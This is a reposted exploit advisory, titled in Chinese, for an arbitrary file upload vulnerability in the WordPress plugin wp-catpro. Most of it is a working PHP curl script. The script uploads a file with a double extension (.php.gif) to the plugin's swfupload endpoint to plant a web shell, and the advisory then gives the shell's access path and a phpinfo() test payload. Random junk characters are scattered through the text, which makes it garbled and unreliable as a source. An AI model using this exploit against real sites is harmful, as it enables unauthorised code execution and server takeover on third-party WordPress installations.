WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
  l* I8 ]' z8 Q7 c; \测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

0 A" n4 y/ j- m2 \" V. T. l#=> Exploit 信息:
  F6 E! Y, F! \) Y------------------
# 攻击者可以上传 file/shell.php.gif
- h% Q7 Y( X& p/ f% L' Q/ m# ("jpg", "gif", "png")  // Allowed file extensions
. {4 W2 `% \5 `3 Q# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
0 o- T. j1 K% h3 O------------------

2 c" o. b5 w& ?3 k2 g#=> Exploit
-----------
<?php
) Y; m) r  B$ J
1 h, l9 {- f/ B+ t+ O' z3 b/ |$uploadfile="zik.php.gif";
. W. `( m+ \6 A- h! V% Q$ W$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
$ p, ?: P! c2 O2 Acurl_setopt($ch, CURLOPT_POST, true);
; f/ {8 _1 M% S' x: Y% }curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
3 f. I0 |, v9 O( ?* F
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
1 ]; T( m' Z$ X# z" @4 }+ ?  ?>
+ s/ i, g, j8 R  X2 G1 c<?php
: _# k. r( B- R" `1 L; S- V3 sphpinfo();
?>